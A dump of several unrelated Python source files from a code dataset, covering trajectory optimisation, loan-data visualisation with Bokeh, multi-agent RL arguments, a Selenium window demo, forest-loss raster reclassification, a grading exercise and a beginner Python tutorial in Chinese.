won't solve\n self._status_msg(\"Fathom due to incompatible bounds\")\n continue\n # solve the LP\n # with unhandled arguments passed to solver\n self.lp_count += 1\n this_node.solve(**kwargs)\n if this_node.status < 0:\n # fathomed as infeasible\n self._status_msg(\"Fathom infeasible status=%i\" % (this_node.status))\n continue\n if this_node.objective.value() >= self.incumbent_cost:\n # fathomed as did not improve\n self._status_msg(\"Fathom after solving cost=%f\" % (this_node.objective.value()))\n continue\n if this_node._unionFeasible():\n # awesome - this is my new incumbent\n self.incumbent_cost = this_node.objective.value()\n self.incumbent_node = this_node\n self.incumbent_sol = [vv.varValue for vv in this_node.variables()]\n self._status_msg(\"New incumbent %f\" % (this_node.objective.value()))\n else:\n self._branch(this_node)\n self._status_msg(\"Branched with bound=%f\" % (this_node.objective.value()))\n else:\n self.status=0\n self._status_msg(\"Iteration limit reached\")\n # if ever found solution\n if self.incumbent_costthis_box[0] and point[0]this_box[2] and point[1]this_box[0]\n assert this_box[3]>this_box[2]\n assert this_box[5]>this_box[4]\n self.addStatic3DObst(this_box[0],this_box[1],this_box[2],this_box[3],this_box[4],this_box[5])\n\n def plotBoxes(self,ax):\n for this_box in self.boxes:\n ax.plot([this_box[0],this_box[0],this_box[1],this_box[1],this_box[0]],\n [this_box[2],this_box[3],this_box[3],this_box[2],this_box[2]],\n [this_box[4],this_box[4],this_box[4],this_box[4],this_box[4]],\n 'r')\n ax.plot([this_box[0],this_box[0],this_box[1],this_box[1],this_box[0]],\n [this_box[2],this_box[3],this_box[3],this_box[2],this_box[2]],\n [this_box[5],this_box[5],this_box[5],this_box[5],this_box[5]],\n 'r')\n ax.plot([this_box[0],this_box[0]],\n [this_box[2],this_box[2]],\n [this_box[4],this_box[5]],\n 'r')\n ax.plot([this_box[1],this_box[1]],\n [this_box[2],this_box[2]],\n [this_box[4],this_box[5]],\n 'r')\n ax.plot([this_box[0],this_box[0]],\n [this_box[3],this_box[3]],\n [this_box[4],this_box[5]],\n 'r')\n ax.plot([this_box[1],this_box[1]],\n [this_box[3],this_box[3]],\n [this_box[4],this_box[5]],\n 'r')\n\n def plotTraj3D(self):\n fig = plt.figure()\n ax = Axes3D(fig)\n self.plotBoxes(ax)\n ax.plot([x[self.ind_x].varValue for x in self.var_x],\n [x[self.ind_y].varValue for x in self.var_x],\n [x[self.ind_z].varValue for x in self.var_x])\n if self.term_x:\n ax.plot([self.term_x[self.ind_x]],\n [self.term_x[self.ind_y]],\n [self.term_x[self.ind_z]], 'g*')\n if self.init_x:\n ax.plot([self.init_x[self.ind_x]],\n [self.init_x[self.ind_y]],\n [self.init_x[self.ind_z]], 'gs')\n plt.show()\n\nclass LTr3DShortest(LTraj3DAvoid):\n\n def __init__(self,Nt,name=\"Trajectory\"):\n A = np.eye(3)\n B = np.eye(3)\n LTraj3DAvoid.__init__(self,A,B,Nt,name=name,sense=1)\n self.add2Norm3DStageCost(np.zeros((3,3)),np.eye(3))\n\ndef unionTest():\n lt = LpProbUnionCons()\n x = pulp.LpVariable(\"x\")\n y = pulp.LpVariable(\"y\")\n lt += -x+y\n r1=[x+1,-2-x,y-2,1-y]\n r2=[x+3,-4-x,y-2,1-y]\n lt.addUnionConstraint((r1,r2))\n lt.solveByMILP()\n return lt\n\ndef ltrajTest2():\n A = np.eye(2)\n B = np.eye(2)\n lt = LTraj(A,B,5)\n lt.setInitialState([2.0,3.0])\n lt.setTerminalState([4.0,4.0])\n #lt.addInfNormStageCost(np.zeros((2,2)),np.eye(2))\n lt.add2NormStageCost(np.zeros((2,2)),np.eye(2))\n lt.addConstraint(lt.var_x[2][0]>=5.5)\n #lt.addInfNormStageCost(np.eye(2),np.zeros((2,2)))\n lt.solve()\n lt.plotStateHistory()\n lt.plotTraj2D()\n return lt\n\ndef lavTest():\n A = np.eye(2)\n B = np.eye(2)\n lt = LTrajAvoid(A,B,5)\n lt.setInitialState([2.0,3.0])\n lt.setTerminalState([8.0,4.0])\n #lt.addInfNormStageCost(np.zeros((2,2)),np.eye(2))\n lt.add2NormStageCost(np.zeros((2,2)),np.eye(2),Nc=11)\n lt.addStatic2DObst(2.5,3.5,1.5,4.5)\n lt.addStatic2DObst(5.5,6.5,3.5,7.5)\n return lt\n\ndef bbTest():\n lt = lavTest()\n if pulp.GUROBI().available():\n # solve by Gurobi, if installed\n lt.solveByBranchBound(solver=pulp.GUROBI(msg=0))\n else:\n print(\"Could not find Gurobi - trying built-in solver\")\n # or solve by PuLP default built-in solver\n lt.solveByBranchBound()\n lt.plotTraj2D()\n return lt\n\ndef milpTest():\n lt = lavTest()\n if pulp.GUROBI().available():\n # solve by Gurobi, if installed\n lt.solveByMILP(solver=pulp.GUROBI())\n else:\n print(\"Could not find Gurobi - trying built-in solver\")\n # or solve by PuLP default built-in solver\n lt.solveByMILP()\n lt.plotTraj2D()\n return lt\n\ndef randomTest(num_boxes=3,method='MILP',**kwargs):\n A = np.eye(2)\n B = np.eye(2)\n lt = LTraj2DAvoid(A,B,5)\n lt.setInitialState([0.0,0.0])\n lt.setTerminalState([10.0,10.0])\n lt.add2NormStageCost(np.zeros((2,2)),np.eye(2))\n box_ctrs = np.random.uniform(low=2.0,high=8.0,size=(num_boxes,2))\n box_sizes = np.random.uniform(low=0.1,high=0.75,size=(num_boxes,2))\n plt.cla()\n for bb in range(num_boxes):\n this_box = (box_ctrs[bb,0]-box_sizes[bb,0],\n box_ctrs[bb,0]+box_sizes[bb,0],\n box_ctrs[bb,1]-box_sizes[bb,1],\n box_ctrs[bb,1]+box_sizes[bb,1])\n assert this_box[1]>this_box[0]\n assert this_box[3]>this_box[2]\n lt.addStatic2DObst(this_box[0],this_box[1],this_box[2],this_box[3])\n # solve it\n if method=='MILP':\n lt.solveByMILP(**kwargs)\n lt.plotTraj2D()\n elif method=='BNB':\n lt.solveByBranchBound(**kwargs)\n lt.plotTraj2D()\n return lt\n\ndef randomTest3D(num_boxes=3,method='MILP',**kwargs):\n A = np.eye(3)\n B = np.eye(3)\n lt = LTraj3DAvoid(A,B,5)\n lt.setInitialState([0.0,0.0,0.0])\n lt.setTerminalState([10.0,10.0,10.0])\n lt.add2Norm3DStageCost(np.zeros((3,3)),np.eye(3))\n box_ctrs = np.random.uniform(low=2.0,high=8.0,size=(num_boxes,3))\n box_sizes = np.random.uniform(low=0.1,high=0.75,size=(num_boxes,3))\n for bb in range(num_boxes):\n this_box = (box_ctrs[bb,0]-box_sizes[bb,0],\n box_ctrs[bb,0]+box_sizes[bb,0],\n box_ctrs[bb,1]-box_sizes[bb,1],\n box_ctrs[bb,1]+box_sizes[bb,1],\n box_ctrs[bb,2]-box_sizes[bb,2],\n box_ctrs[bb,2]+box_sizes[bb,2])\n assert this_box[1]>this_box[0]\n assert this_box[3]>this_box[2]\n assert this_box[5]>this_box[4]\n lt.addStatic3DObst(this_box[0],this_box[1],this_box[2],this_box[3],this_box[4],this_box[5])\n # solve it\n if method=='MILP':\n lt.solveByMILP(**kwargs)\n lt.plotTraj3D()\n elif method=='BNB':\n lt.solveByBranchBound(**kwargs)\n lt.plotTraj3D()\n return lt\n\ndef random3DShortest(Nt=5,num_boxes=10,ctr_range=(2.0,8.0),size_range=(0.1,3.0),method='MILP',**kwargs):\n lt = LTr3DShortest(Nt=5)\n lt.setInitialState([0.0,0.0,0.0])\n lt.setTerminalState([10.0,10.0,10.0])\n lt.addRandomBoxes(num_boxes,ctr_range,size_range)\n # solve it\n if method=='MILP':\n lt.solveByMILP(**kwargs)\n lt.plotTraj3D()\n elif method=='BNB':\n lt.solveByBranchBound(**kwargs)\n lt.plotTraj3D()\n return lt\n\nif __name__==\"__main__\":\n randomTest(num_boxes=8,method='MILP')\n","repo_name":"arthurrichards77/pytro","sub_path":"ltraj.py","file_name":"ltraj.py","file_ext":"py","file_size_in_byte":29996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"31202755449","text":"# A program to visualize declined loan data using Pandas and Bokeh\r\n# The data files can be downloaded at \"DECLINED LOAN DATA\" section on https://www.lendingclub.com/info/download-data.action\r\n# The program runs on Bokeh server: open Anaconda Prompt, go to the folder containing the code file, type bokeh serve --show Reject_stats.py and enter\r\n\r\nimport pandas as pd\r\nfrom bokeh.io import curdoc\r\nfrom bokeh.plotting import figure\r\nfrom bokeh.models import ColumnDataSource, Select, LinearColorMapper, HoverTool, BoxSelectTool, Slider, LabelSet\r\nfrom bokeh.palettes import Viridis256\r\nfrom bokeh.layouts import row, column\r\n\r\ndef update_y(attr, old, new): # a function to update y-axis of a chart\r\n med = all_data[all_data['Application Date'].dt.year == slider1.value].groupby(['Employment Length'])[y_sel.value].mean().round(4)\r\n med = med.sort_values(ascending=False)\r\n p_med.yaxis.axis_label = y_sel.value\r\n p_med.x_range.factors = list(med.index)\r\n medCDS.data = dict(x=med.index, y=med.values)\r\n \r\ndef update_x(attr, old, new): # a function to update x-axis of a chart\r\n cnt = all_data[all_data['Application Date'].dt.year == slider2.value].groupby(x_sel.value)[x_sel.value].count()\r\n cnt = cnt.sort_values(ascending=False)\r\n p_cnt.xaxis.axis_label = x_sel.value\r\n \r\n if(cnt.count())>=20:\r\n temp = cnt.nlargest(20) # display 20 largest categories at most on x-axis\r\n p_cnt.x_range.factors = list(temp.index)\r\n cntCDS.data = dict(x=temp.index, y=temp.values)\r\n else:\r\n p_cnt.x_range.factors = list(cnt.index)\r\n cntCDS.data = dict(x=cnt.index, y=cnt.values)\r\n\r\n# put the data files in the same folder as the code file (for simplicity reasons)\r\n# read the data into Pandas, skip the first rwo, parse 'Application Date' as date format\r\nd0 = pd.read_csv('RejectStatsA.csv', skiprows=[0], parse_dates=['Application Date']) # 2007-2012 data\r\nd1 = pd.read_csv('RejectStatsB.csv', skiprows=[0], parse_dates=['Application Date']) # 2013-2014 data\r\nd2 = pd.read_csv('RejectStatsD.csv', skiprows=[0], parse_dates=['Application Date']) # 2015 data\r\nd3 = pd.read_csv('RejectStats_2016Q1.csv', skiprows=[0], parse_dates=['Application Date']) # 2016 Q1 data\r\nd4 = pd.read_csv('RejectStats_2016Q2.csv', skiprows=[0], parse_dates=['Application Date']) # 2016 Q2 data\r\nd5 = pd.read_csv('RejectStats_2016Q3.csv', skiprows=[0], parse_dates=['Application Date']) # 2016 Q3 data\r\nd6 = pd.read_csv('RejectStats_2016Q4.csv', skiprows=[0], parse_dates=['Application Date']) # 2016 Q4 data\r\nd7 = pd.read_csv('RejectStats_2017Q1.csv', skiprows=[0], parse_dates=['Application Date']) # 2017 Q1 data\r\nd8 = pd.read_csv('RejectStats_2017Q2.csv', skiprows=[0], parse_dates=['Application Date']) # 2017 Q2 data\r\nd9 = pd.read_csv('RejectStats_2017Q3.csv', skiprows=[0], parse_dates=['Application Date']) # 2017 Q3 data\r\n# union data\r\nall_data = pd.concat([d0,d1,d2,d3,d4,d5,d6,d7,d8,d9], ignore_index=True)\r\n\r\n# convert Percent(object) to Float\r\nall_data['Debt-To-Income Ratio'] = all_data['Debt-To-Income Ratio'].replace('%','',regex=True).astype('float')/100\r\n\r\n# add two selection widgets\r\ny_sel = Select(title='Y Axis:', options=['Amount Requested','Debt-To-Income Ratio'], value='Amount Requested')\r\nx_sel = Select(title='X Axis:', options=['Employment Length', 'Loan Title'], value='Employment Length')\r\n\r\n# add two sliders\r\nslider1 = Slider(title=\"Select above one year\", start = all_data['Application Date'].dt.year.min(), end = all_data['Application Date'].dt.year.max(), \r\n value = all_data['Application Date'].dt.year.min(), step=1)\r\nslider2 = Slider(title=\"Select above one year\", start = all_data['Application Date'].dt.year.min(), end = all_data['Application Date'].dt.year.max(), \r\n value = all_data['Application Date'].dt.year.min(), step=1)\r\n\r\n# calculate average Amount Requested over the years, display 4 decimal points\r\navg_amt = all_data.groupby('Application Date')['Amount Requested'].mean().round(4)\r\n\r\n# calculate average Debt-To-Income Ratio, display 4 decimal points\r\navg_ratio = all_data.groupby('Application Date')['Debt-To-Income Ratio'].mean().round(4)\r\n\r\n# calculate average based on slider value and sort, display 4 decimal points\r\nmed = all_data[all_data['Application Date'].dt.year == slider1.value].groupby(['Employment Length'])[y_sel.value].mean().round(4)\r\nmed = med.sort_values(ascending=False)\r\n\r\n# calculate counts based on slider value and sort, display 4 decimal points\r\ncnt = all_data[all_data['Application Date'].dt.year == slider2.value].groupby(x_sel.value)[x_sel.value].count()\r\ncnt = cnt.sort_values(ascending=False)\r\n\r\n# put into Column Data Source for faster and easier visualization\r\navg_amtCDS = ColumnDataSource(data=dict(x=avg_amt.index, y=avg_amt.values))\r\navg_ratioCDS = ColumnDataSource(data=dict(x=avg_ratio.index, y=avg_ratio.values))\r\nmedCDS = ColumnDataSource(data=dict(x=med.index, y=med.values))\r\ncntCDS = ColumnDataSource(data=dict(x=cnt.index, y=cnt.values))\r\n\r\n# create figure 1, add tools, time series chart\r\np_amt = figure(title='Trend of Average Amount Requested (Declined)', x_axis_label='Application Date', y_axis_label='Average Amount Requested', \r\n x_axis_type=\"datetime\", plot_width=600, plot_height=300)\r\np_amt.add_tools(BoxSelectTool(), HoverTool(tooltips=[('Average Amount','$y{1.11}')])) \r\np_amt.line('x', 'y', color='blue', legend='Average Amount Requested (Declined)', source=avg_amtCDS)\r\n\r\n# create figure 2, add tools, time series chart\r\np_ratio = figure(title='Trend of Average Debt-To-Income Ratio', x_axis_label='Application Date', y_axis_label='Average Debt-To-Income Ratio',\r\n x_axis_type=\"datetime\", plot_width=600, plot_height=300) # y_range=(0,200), y_range=(0,10)\r\np_ratio.add_tools(BoxSelectTool(), HoverTool(tooltips=[('Average Ratio','$y{1.11}')])) \r\np_ratio.line('x', 'y', color='red', legend='Average Debt-To-Income Ratio', source=avg_ratioCDS)\r\n\r\nViridis256.reverse() # reverse color palettes so that the higher values are in deeper colors\r\n\r\n# create figure 3, add tools, vertical bar chart\r\np_med = figure(title='Average by Employment Length by Year', x_axis_label='Employment Length', x_range = list(med.index), plot_width=600, plot_height=400)\r\np_med.vbar('x', top='y', width=.5, source=medCDS,\r\n color={'field':'y','transform':LinearColorMapper(palette=Viridis256, low=min(med.values), high=max(med.values))})\r\np_med.add_tools(BoxSelectTool(), HoverTool(tooltips=[('Median Amount','$y{1.11}'), ('Employment Length','@x')]))\r\np_med.yaxis.axis_label = y_sel.value\r\n\r\n# create figure 4, add tools, vertical bar chart\r\np_cnt = figure(title='Top 20 Counts by Year', y_axis_label='Count', x_range = list(cnt.index), plot_width=600, plot_height=400)\r\np_cnt.vbar('x', top='y', width=.5, source=cntCDS,\r\n color={'field':'y','transform':LinearColorMapper(palette=Viridis256, low=min(cnt.values), high=max(cnt.values))})\r\np_cnt.add_tools(BoxSelectTool(), HoverTool(tooltips=[('Median count','$y{1.11}'), ('X Value','@x')])) \r\np_cnt.xaxis.major_label_orientation = 45\r\np_cnt.xaxis.axis_label = x_sel.value\r\n\r\n# event triggers for selection widgets and sliders\r\ny_sel.on_change('value',update_y)\r\nx_sel.on_change('value',update_x)\r\nslider1.on_change('value', update_y)\r\nslider2.on_change('value', update_x)\r\n\r\n# add data labels to figure 3 and 4\r\nbarLabels1 = LabelSet(x='x', y='y', text='y', text_font_size='8pt', x_offset=-10, y_offset=2,source=medCDS)\r\nbarLabels2 = LabelSet(x='x', y='y', text='y', text_font_size='8pt', x_offset=-10, y_offset=2,source=cntCDS)\r\np_med.add_layout(barLabels1)\r\np_cnt.add_layout(barLabels2)\r\n\r\n# put into layout and run on Bokeh server\r\nlayout = column(row(p_amt,p_ratio), row(column(row(slider1,y_sel), p_med), column(row(slider2,x_sel), p_cnt)))\r\ncurdoc().add_root(layout)\r\ncurdoc().title = \"Declined Loan Data\"","repo_name":"ShunYaoCodes/declined-loan-data-visualization","sub_path":"reject_stats.py","file_name":"reject_stats.py","file_ext":"py","file_size_in_byte":7868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"23385144706","text":"from argparse import ArgumentParser\nimport torch\n\ndef common_args():\n parser = ArgumentParser()\n\n # smac args\n parser.add_argument('--difficulty', type=str, default='7', help='the difficulty of the game')\n parser.add_argument('--game_version', type=str, default='latest', help='the version of the game')\n parser.add_argument('--map', type=str, default='3m', help='the map of the game')\n parser.add_argument('--step_mul', type=int, default=8, help='how many steps to make an action')\n parser.add_argument('--replay_dir', type=str, default='', help='absolute path to save the replay')\n\n # general args\n parser.add_argument(\"--env\", \"-e\", default=\"Switch2-v0\", help=\"set env name\")\n parser.add_argument(\"--n_steps\", \"-ns\", type=int, default=2000000, help=\"set total time steps to run\")\n parser.add_argument(\"--n_episodes\", \"-nep\", type=int, default=1, help=\"set n_episodes\")\n parser.add_argument(\"--epsilon\", \"-eps\", default=0.5, help=\"set epsilon value\")\n parser.add_argument('--last_action', type=bool, default=True, help='whether to use the last action to choose action')\n parser.add_argument('--reuse_network', type=bool, default=True, help='whether to use one network for all agents')\n parser.add_argument('--gamma', type=float, default=0.99, help='the discount factor')\n parser.add_argument('--evaluate_epoch', type=int, default=20, help='the number of the epoch to evaluate the agent')\n parser.add_argument('--alg', type=str, default='vdn', help='the algorithm to train the agent')\n parser.add_argument('--optimizer', type=str, default=\"RMS\", help='the optimizer')\n parser.add_argument('--model_dir', type=str, default='./model', help='model directory of the policy')\n parser.add_argument('--result_dir', type=str, default='./result', help='result directory of the policy')\n parser.add_argument('--load_model', type=bool, default=False, help='whether to load the pretrained model')\n parser.add_argument('--learn', type=bool, default=True, help='whether to train the model')\n parser.add_argument('--evaluate_cycle', type=int, default=5000, help='how often to eval the model')\n parser.add_argument('--target_update_cycle', type=int, default=200, help='how often to update the target network')\n parser.add_argument('--save_cycle', type=int, default=3333, help='how often to save the model')\n parser.add_argument('--cuda', type=bool, default=False, help='whether to use the GPU')\n\n # args for the acd framework\n\n parser.add_argument(\"--global_temp\",action=\"store_true\",default=False,help=\"Should we model temperature confounding?\")\n parser.add_argument(\"--dims\", type=int, default=4, help=\"Dimensionality of input.\")\n\n parser.add_argument(\n \"--encoder_hidden\", type=int, default=256, help=\"Number of hidden units.\"\n )\n parser.add_argument(\n \"--decoder_hidden\", type=int, default=256, help=\"Number of hidden units.\"\n )\n parser.add_argument(\n \"--encoder\",\n type=str,\n default=\"mlp\",\n help=\"Type of path encoder model (mlp or cnn).\",\n )\n parser.add_argument(\n \"--decoder\",\n type=str,\n default=\"mlp\",\n help=\"Type of decoder model (mlp, rnn, or sim).\",\n )\n parser.add_argument(\n \"--prior\",\n type=float,\n default=1,\n help=\"Weight for sparsity prior (if == 1, uniform prior is applied)\",\n )\n parser.add_argument(\n \"--edge_types\",\n type=int,\n default=2,\n help=\"Number of different edge-types to model\",\n )\n\n parser.add_argument(\n \"--encoder_dropout\",\n type=float,\n default=0.0,\n help=\"Dropout rate (1 - keep probability).\",\n )\n parser.add_argument(\n \"--decoder_dropout\",\n type=float,\n default=0.0,\n help=\"Dropout rate (1 - keep probability).\",\n )\n\n parser.add_argument(\n \"--no_factor\",\n action=\"store_true\",\n default=False,\n help=\"Disables factor graph model.\",\n )\n\n ### unobserved time-series ###\n parser.add_argument(\n \"--unobserved\",\n type=int,\n default=0,\n help=\"Number of time-series to mask from input.\",\n )\n parser.add_argument(\n \"--model_unobserved\",\n type=int,\n default=0,\n help=\"If 0, use NRI to infer unobserved particle. \"\n \"If 1, removes unobserved from data. \"\n \"If 2, fills empty slot with mean of observed time-series (mean imputation)\",\n )\n parser.add_argument(\n \"--dont_shuffle_unobserved\",\n action=\"store_true\",\n default=False,\n help=\"If true, always mask out last particle in trajectory. \"\n \"If false, mask random particle.\",\n )\n parser.add_argument(\n \"--teacher_forcing\",\n type=int,\n default=0,\n help=\"Factor to determine how much true trajectory of \"\n \"unobserved particle should be used to learn prediction.\",\n )\n parser.add_argument(\n \"--load_folder\",\n type=str,\n default=\"\",\n help=\"Where to load pre-trained model if finetuning/evaluating. \"\n + \"Leave empty to train from scratch\",\n )\n\n parser.add_argument(\n \"--GPU_to_use\", type=int, default=None, help=\"GPU to use for training\"\n )\n\n parser.add_argument(\n \"--dont_skip_first\",\n action=\"store_true\",\n default=False,\n help=\"If given as argument, do not skip first edge type in decoder, i.e. it represents no-edge.\",\n )\n\n parser.add_argument(\n \"--dont_use_encoder\",\n action=\"store_true\",\n default=False,\n help=\"If true, replace encoder with distribution to be estimated\",\n )\n\n parser.add_argument(\n \"--lr_decay\",\n type=int,\n default=200,\n help=\"After how epochs to decay LR by a factor of gamma.\",\n )\n \n parser.add_argument(\n \"--temp\", type=float, default=0.5, help=\"Temperature for Gumbel softmax.\"\n )\n\n args = parser.parse_args()\n\n args.num_GPU = 0\n args.device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n if args.cuda:\n args.num_GPU = 1 \n\n args.factor = not args.no_factor\n args.skip_first = not args.dont_skip_first\n args.use_encoder = not args.dont_use_encoder\n\n # in accordance to acd framework\n if \"PredatorPrey\" in args.env:\n args.timesteps = 100\n args.dims = 25 \n args.num_atoms = 6\n\n if \"Lumberjacks\" in args.env:\n args.timesteps = 100 \n args.dims = 18 \n args.num_atoms = 5\n\n if \"3m\" in args.env:\n args.timesteps = 60 \n args.dims = 1 \n args.num_atoms = 4\n\n return args\n\n\ndef config_args(args):\n\t# buffer/batch sizes\n\targs.batch_size = 32\n\targs.buffer_size = int(5e3)\n\t\n\t#epsilon args for vdn\n\targs.epsilon = 1\n\targs.min_epsilon = 0.05\n\tanneal_steps = 50000\n\targs.anneal_epsilon = (args.epsilon - args.min_epsilon) / anneal_steps\n\targs.epsilon_anneal_scale = 'step'\n\n\t# network\n\targs.rnn_hidden_dim = 64\n\targs.lr = 5e-4\n\n\t# train steps\n\targs.train_steps = 1\n\n\t# prevent gradient explosion\n\targs.grad_norm_clip = 10\t\n\n\treturn args\n\n","repo_name":"rafaelmp2/causal-marl","sub_path":"MARL_framework/acd_with_marl/common/arguments.py","file_name":"arguments.py","file_ext":"py","file_size_in_byte":6900,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"30084070467","text":"# -*- coding: utf-8 -*-\n# @Author : 王翔\n# @JianShu : 清风Python\n# @Date : 2019/6/19 0:02\n# @Software : PyCharm\n# @version :Python 3.6.8\n# @File : Day2.2_chrome_option_window.py\n\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\n\noptions = Options()\noptions.add_argument('--start-maximized')\n# options.add_argument('--window-size=900,600')\n\ndriver = webdriver.Chrome(chrome_options=options)\ndriver.get(\"https://www.jianshu.com/u/d23fd5012bed\")\n\ndriver.quit()\n\n","repo_name":"BreezePython/SeleniumTest","sub_path":"Day2_selenium浏览器窗口与Option操作/Day2.2_chrome_option_window.py","file_name":"Day2.2_chrome_option_window.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"40"} +{"seq_id":"4348318611","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Nov 17 13:48:48 2019\nThis script reclassifies lossyear > 12 to 1, 0 otherwise.\n@author: pj276\n\"\"\"\n\n# Import packages\nimport sys, os, gdal\nimport numpy as np\nsys.path.append('/home/pj276/projects/ifl_corridors/code/functions/')\n# For hf_utilities, the modules are available within the functions\n# when they're used. Otherwise, one needs to prefix with hfu.\n# e.g. hfu.shp.Writer\nimport hf_utilities as hfu\nsys.path.append('/home/pj276/projects/ifl_corridors/code/parameter_files/')\nsys.path.append('/home/pj276/projects/undp_connectivity/code/parameter_files/')\nimport param_file as p1\n\n# Job array index\nj = int(sys.argv[1]) - 1 # subtract for python zero indexing\n\n# Loss year value\nlyv = p1.lyv #12\n\n# Threshold type\ngtorlt = p1.gtorlt\n\n# Reclass loss year name\nrclyname = p1.rclyname\n\n# List loss year files\nfl = os.listdir(p1.tld + p1.fcd)\nfl = [i for i in fl if 'lossyear' in i and i.endswith('.tif')]\n\n# Get file name to work on\nfnamely = p1.tld + p1.fcd + '/' + fl[j]\n\n# Loss year\nlyear = hfu.raster2array(fnamely)\nlya = lyear[0]\ndel lyear\n\nif gtorlt == 'gt':\n # Reclass loss year > 12 to 1, else 0\n lya = np.where(lya > lyv, 1, 0)\n lya = lya.astype('int8')\nelse:\n # Reclass loss year <= 12 to 1, else 0\n lya = np.where((lya > 0) & (lya <= lyv), 1, 0)\n lya = lya.astype('int8')\n\n# Output reclassed loss file name\nofn = os.path.dirname(fnamely) + os.sep + os.path.basename(fnamely).replace('lossyear', rclyname)\n# Write to array\nhfu.array2raster(ofn, fnamely, gdal.GDT_Byte, 'GTiff', lya)\n","repo_name":"forest-rev/ifl_connectivity","sub_path":"scripts/hf2_reclass_lossyear.py","file_name":"hf2_reclass_lossyear.py","file_ext":"py","file_size_in_byte":1556,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"10948959974","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Dec 25 23:37:07 2017\n\n@author: zil20\n\"\"\"\n\ndef computegrade(score):\n if 0.0 <= score < 0.6:\n return \"F\"\n elif score < 0.7:\n return \"D\"\n elif score < 0.8:\n return \"C\"\n elif score < 0.9:\n return \"B\"\n elif score <= 1.0: \n return \"A\"\n else:\n return \"Bad score\"\ntry: \n score = float(input(\"Enter score: \"))\n print(computegrade(score))\n \nexcept:\n print(\"Bad score\") ","repo_name":"franciszxlin/pythonlearn","sub_path":"Exercises/ch3e3.py","file_name":"ch3e3.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"38964032307","text":"\n# coding: utf-8\n\n# \n# # StudyQuant\n# 作者 : Rudy\n\n# # 基本数据类型\n\n# Python 是一种动态类型语言,这意味着. Python 解择程序在运行时推知对象的类也C\n# 等编译语言通常是静态类型语言,在这类语言,对象类型必须在编译之前与对象\n# 绑定\n\n# # Python有五个标准的数据类型:\n# - Numbers(数字)\n# - String(字符串)\n# - List(列表)\n# - Tuple(元组)\n# - Dictionary(字典)\n# \n\n# 四种不同的数类型:\n# - int(整型) 0,1 等\n# - long(长整型[也可以代表八进制和十六进制])\n# - float(浮点型) 3.6 等\n# - complex(复数) 如 4+2j\n# - Bool : True, False\n# - String : “hello, world”\n# \n\n# # 一切都是对象\n\n# ## Basic Data Types\n\n# # int 整数\n\n# In[28]:\n\n\na = 10\ntype(a)\n\n\n# In[29]:\n\n\na.bit_length() #获得表现int 对象所需的位数\n\n\n# In[30]:\n\n\na = 100000\n\n\n# In[31]:\n\n\nprint(a)\n\n\n# In[8]:\n\n\ngoogol = 10 ** 100\ngoogol\n\n\n# In[32]:\n\n\n1 + 4\n\n\n# In[33]:\n\n\n1 / 4\n\n\n# In[34]:\n\n\ntype(1 / 4)\n\n\n# In[35]:\n\n\n5*6\n\n\n# In[36]:\n\n\n10/2\n\n\n# ## 数字的基本操作\n# python中的数字都支持下面的操作:\n# \n# 1、x + y:x加y;\n# 2、x - y:x减y;\n# 3、x * y:x和y的积;\n# 4、x / y:x和y的商;\n# 5、x // y:x和y的商的下限,即取整;\n# 6、x % y:x/y的余;\n# 7、abs(x):x为整型和浮点型,返回x的绝对值;x为复数型,返回x的magnitude(注);\n# 8、int(x):将x转换到整型;\n# 9、float(x):将x转换到浮点型;\n# 10、complex(re, im):得到实部为re,虚部为im的复数;\n# 11、c.conjugate():返回复数c的共轭复数;\n# 12、divmod(x, y):返回对(x // y, x % y);\n# 13、pow(x, y):x的y次方;\n# 14、x ** y:同pow(x, y),x的y次方。\n# \n\n# ### Floats\n\n# In[43]:\n\n\n1 / 4\n\n\n# In[44]:\n\n\ntype (1. / 4)\n\n\n# In[45]:\n\n\nb = 0.35\ntype(b)\n\n\n# ### Strings\n\n# 而'Hello, World!' 是一个字符串,之所以这\n# 么称呼是因为它包含一“串”字母。因为被引号包围,读者(以及解释器)可以将它们识\n# 别为字符串。\n\n# In[46]:\n\n\nt = 'studyQuant offers Python Courses'\n\n\n# In[47]:\n\n\nt\n\n\n# In[48]:\n\n\nt.capitalize()\n\n\n# In[49]:\n\n\nt.split()\n\n\n# In[50]:\n\n\nt.upper()\n\n\n# In[51]:\n\n\nt.find('studyquant')\n\n\n# In[52]:\n\n\nt.find('Python')\n\n\n# In[53]:\n\n\nt[18]\n\n\n# In[54]:\n\n\nt.replace(' ', '|')\n\n\n# In[58]:\n\n\n'http://www.python.org'.strip('htp:/')\n\n\n# \n## 更多量化学习资源\n#\n# \"StudyQuant\"
    \n#\n# 扫上方二维码,关注公众账号 量化投资学院 ,获取下列免费资源\n# - 回复**“热点研报”**,获取近年热点券商金融工程研究报告\n# - 回复**“Python3”**,获取Python免费学习教程\n# - 回复**“quant教材与面试经验”**, 获取 quant教材与面试经验 资料\n# * [更多福利请点击此链接](https://www.jianshu.com/p/2ffb29f1a1aa)\n#\n#\n# ## 关注StudyQuant\n# * [课程](https://appcop3i2898823.h5.xiaoeknow.com/homepage)\n# - [量化投资与数据分析实战](http://study.163.com/course/introduction/1004855008.htm?share=2&shareId=400000000342001)\n# - [量化投资与数字货币实战](https://appcop3i2898823.h5.xiaoeknow.com/homepage)\n# * [知乎](https://zhuanlan.zhihu.com/studyquant)\n# * [简书](https://www.jianshu.com/u/495eda774816)\n# * [公众号](https://mp.weixin.qq.com/s__biz=MzU5NzU5NjIwMQ==&mid=100000028&idx=1&sn=2f8c053849f296455ec85406e80b2a2d&chksm=7e50405a4927c94c18ba438e0c309a7d13883621ddf02904266026556e9994ad1c3f8558327d&mpshare=1&scene=1&srcid=0810AEevB9zID4Ywzl1icPfA#rd)\n#\n# #","repo_name":"studyquant/studyquant","sub_path":"Tutorial/1.0 数据类型介绍/1.3 